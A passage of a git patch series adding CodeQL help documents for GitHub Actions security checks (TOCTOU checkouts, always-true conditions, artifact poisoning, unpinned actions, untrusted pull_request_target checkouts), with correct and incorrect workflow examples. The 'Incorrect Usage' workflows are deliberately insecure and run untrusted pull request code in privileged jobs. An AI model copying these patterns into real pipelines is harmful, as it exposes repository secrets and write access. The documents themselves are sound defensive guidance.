Verify that Commit containing the code to be executed was commited **before** then date the of the comment. +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Issue Ops) + +The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + - run: ./cmd +``` + +### Correct Usage (Issue Ops) + +In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR Info + id: pr + env: + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GH_REPO: ${{ github.repository }} + COMMENT_AT: ${{ github.event.comment.created_at }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.pr.outputs.head_sha }} + - run: ./cmd +``` + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md new file mode 100644 index 000000000000..105fe6ecd69e --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md @@ -0,0 +1,168 @@ +# Untrusted Checkout TOCTOU + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Issue Ops) + +The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + - run: ./cmd +``` + +### Correct Usage (Issue Ops) + +In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR Info + id: pr + env: + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GH_REPO: ${{ github.repository }} + COMMENT_AT: ${{ github.event.comment.created_at }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.pr.outputs.head_sha }} + - run: ./cmd +``` + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md new file mode 100644 index 000000000000..be1b566083ae --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md @@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Do not use Workflow Expressions: + +```yaml +if: steps.checks.outputs.safe_to_run == true +if: |- + steps.checks.outputs.safe_to_run == true +if: | + steps.checks.outputs.safe_to_run == true +``` + +2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + +```yaml +if: ${{ steps.checks.outputs.safe_to_run == true }} +if: |- + ${{ steps.checks.outputs.safe_to_run == true }} +``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + +```yaml +if: ${{ steps.checks.outputs.safe_to_run }} == true +``` + +2. Do not include trailing new lines or spaces: + +```yaml +if: | + ${{ steps.checks.outputs.safe_to_run == true }} +if: > + ${{ steps.checks.outputs.safe_to_run == true }} +if: " ${{ steps.checks.outputs.safe_to_run == true }}" +if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} +if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} +``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md new file mode 100644 index 000000000000..2d7afb6b66e1 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md new file mode 100644 index 000000000000..2d7afb6b66e1 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md new file mode 100644 index 000000000000..eab708f8602e --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md new file mode 100644 index 000000000000..c391e1255edc --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md new file mode 100644 index 000000000000..c391e1255edc --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md new file mode 100644 index 000000000000..c391e1255edc --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) From 569e80b6784cece7a90f1ac70585d2e6dbfee133 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:17:18 +0200 Subject: [PATCH 470/707] Fix ImproperAccess query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 13 +++++++++---- .../Security/CWE-285/ImproperAccessControl.expected | 2 +- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 2c7882604b27..ba002f16a874 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -17,9 +17,14 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job.isPrivileged() and - job.getATriggerEvent() = event and - event.getName() = "pull_request_target" and - event.getAnActivityType() = "synchronize" and - check.dominates(checkout) + job.getAStep() = checkout and + check.dominates(checkout) and + ( + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" + or + not exists(job.getATriggerEvent()) + ) select checkout, "The checked-out code can be modified after the authorization check $@.", check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected index 53dd12b9fb6e..92f87dc1f35b 100644 --- a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -1 +1 @@ -| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be modified after the authorization check $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | From d166b7c03a085c4a2ee79a7f0015aacdc9b31b9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:34:42 +0200 Subject: [PATCH 471/707] Create publish.yml --- .github/workflows/publish.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 .github/workflows/publish.yml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml new file mode 100644 index 000000000000..390d68453454 --- /dev/null +++ b/.github/workflows/publish.yml @@ -0,0 +1,26 @@ +name: Publish 